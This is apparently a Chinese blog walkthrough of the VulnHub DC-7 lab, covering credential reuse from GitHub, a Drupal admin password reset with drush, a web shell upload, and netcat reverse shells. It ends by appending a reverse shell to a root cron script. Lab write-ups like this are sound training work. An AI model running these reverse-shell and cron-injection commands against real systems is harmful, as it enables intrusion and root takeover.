首页 > 其他分享 >VulnHub-DC-7渗透流程

VulnHub-DC-7渗透流程

时间:2023-06-28 23:01:27浏览次数:47  
标签:shell 渗透 GPG DC 192.168 VulnHub 定时 nc php

DC-7

kali:192.168.157.131

靶机:192.168.157.151

信息收集

nmap -sV -A -p- 192.168.157.151

虽然有robots.txt等敏感文件泄露但是用处不大,但在网页底部有@dc7user

搜索一番,在github找到了他的项目,在config.php内得到了登录用户与密码

$username = "dc7user";
$password = "MdR3xOgB7#dW";

在网站上登录失败,那尝试ssh登录

修改admin密码

backups内是gpg文件,现在没法利用

GPG文件是GNU Privacy Guard加密软件使用的文件格式。GPG是一款开源的加密软件,用于对文件、文本进行加密,并对邮件等内容进行数字签名。GPG文件通常以.gpg或.pgp为扩展名。这些文件包含的是经过GPG加密的二进制数据,需要使用GPG软件及其私钥才能解密。

mbox中记录着root的定时任务,项目位置为/opt/scripts/backups.sh

查看定时任务,但是我们没有修改的权限,不然就可以进行端口监听编写反弹shell

但其中的drush命令是我们可用的

drush命令是drupal框架用来做一些配置的命令,可以用来修改用户名和密码

cd /var/www/html
drush user-password admin --password="123456"

为了能够在网站中进行登录,所以要到/var/www/html目录下进行修改密码

这时我们就可以在网站登录admin用户了

上传shell

Drupal 8不支持PHP代码,因为Drupal 8后为了安全,需要将php单独作为一个模块导入。进入Extend => Install new module,输入php模块包的url

https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

应用模块

这时就可以上传shell了

蚁剑连接

接下来就是熟悉的操作

kali

nc -lnvp 9999

蚁剑终端

nc -e /bin/bash 192.168.157.131 9999

交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

定时任务提权

这时我们就是www-data用户了,可以执行我们的定时任务提权

cd /opt/scripts
echo "nc -e /bin/bash 192.168.157.131 4444" >>backups.sh

然后kali开启监听

nc -lnvp 4444

这时只要等待定时任务触发即可

标签:shell,渗透,GPG,DC,192.168,VulnHub,定时,nc,php
From: https://www.cnblogs.com/Mar10/p/17512784.html

相关文章

  • Vulnhub: DarkHole:1靶机
    kali:192.168.111.111靶机:192.168.111.130信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.130访问目标web网站,注册用户注册时尝试注册用户名为admin的用户,发现存在该用户进入用户后台,利用burp抓包越权修改其他用户的密码admin用户密码......
  • VulnHub_DC-6渗透流程
    DC-6kali:192.168.157.131靶机:192.168.157.150修改host文件,添加192.168.157.150wordy不然解析不了域名信息收集发现是WordPress5.1.1,探测一下用户,使用wpscan对其用户进行枚举wpscan--urlhttp://wordy/--enumerateu另存为user.txt扫一下目录找到登录界面访问http......
  • vulnhub靶场:Thales
    靶场地址:泰雷兹:1~VulnHubkali:172.88.6.144靶场:172.88.6.81 nmap172.88.6.0/24 nmap-T4-sV-P -A172.88.6.81 访问http://172.88.6.81:8080/,发现是tomcat页面,登录需要账户,所以使用msf爆破下 msfconsolesearchtomcat  useauxiliary/scanner/http/t......
  • 无线网渗透之Kali破解wifi密码
    kali破解wifi密码(WiFi渗透)一、前期准备工作1、将无线网卡挂载到Kali上​ 将无线网卡插到电脑上,如果弹出检测到新的USB设备,就将此设备连接到虚拟机。然后点击虚拟机--->可移动设备--->选择自己的网卡--->连接可能出现的问题:在可移动设备处无法连接无线网卡;解决:在虚拟机设置中......
  • [渗透测试]—5.3 网络渗透测试技术和工具
    在本章节中,我们将学习一些常用的网络渗透测试技术和工具,如Wireshark、Ettercap等。我们会尽量将内容讲解得详细、通俗易懂,并提供尽可能多的实例。5.1WiresharkWireshark是一款免费的开源数据包分析器,可以实时或离线捕获、分析和解码网络数据包。Wireshark可以帮助我们识别网络......
  • 一文解开主流开源变更数据捕获技术之Flink CDC的入门使用
    @目录概述定义什么是CDC?CDC的分类特性应用场景支持数据源实战FlinkDataStream方式代码示例FlinkSQL方式代码示例概述定义flink-cdc-connectors官网https://github.com/ververica/flink-cdc-connectors源码release最新版本2.4.0flink-cdc-connectors文档地址https://v......
  • BOSHIDA DC电源模块输入电压与体积的关系
    BOSHIDADC电源模块输入电压与体积的关系DC电源模块是一种将交流电转换为直流电的电源设备,可以为各种家庭电器和电子设备提供稳定的直流电供电。输入电压是DC电源模块最基本的参数,也是使用者最需要关注的参数之一,因为它能决定这个设备的适用范围。在选择DC电源模块时,通常需要根据......
  • [渗透测试]—6.3 无线网络渗透测试工具
    在本章节中,我们将学习一些常用的无线网络渗透测试工具,如Aircrack-ng、Reaver等。我们将尽量讲解得详细、通俗易懂,并提供尽可能多的实例。6.1Aircrack-ng套件Aircrack-ng是一个用于测试无线网络安全的工具集,包括捕获数据包、破解WEP和WPA/WPA2-PSK密钥、创建和管理访问点等功能......
  • 24W机壳式AC-DC降压开关电源模块AP21-24W24N产品简介
    输入电压:100~250V输出电压:24V输出电流:1000mA输出功率:24W产品尺寸:85*58*33mm安装方式:螺丝固定功能特点:高精度工业电源产品简介:AP21-24W24N是一款小体积机壳式开关电源,交流直流两用,输入电压85~264Vac/100~370Vdc,超低纹波、超低功耗、高效率、安全隔离、高可靠性等优点;符合IEC60950......
  • 数字逻辑综合 DC 相关理解(三)
    参考http://www.cnblogs.com/IClearner1.DC编译策略及工具版本编译策略两种:top-down,bottom-up;top-down顶层设计和子设计在一起编译;所有的环境和约束设置针对顶层设计;此种策略自动考虑到相关的内部设计。但是此种策略不适合大型设计;因为设计必须同时驻内存;硬......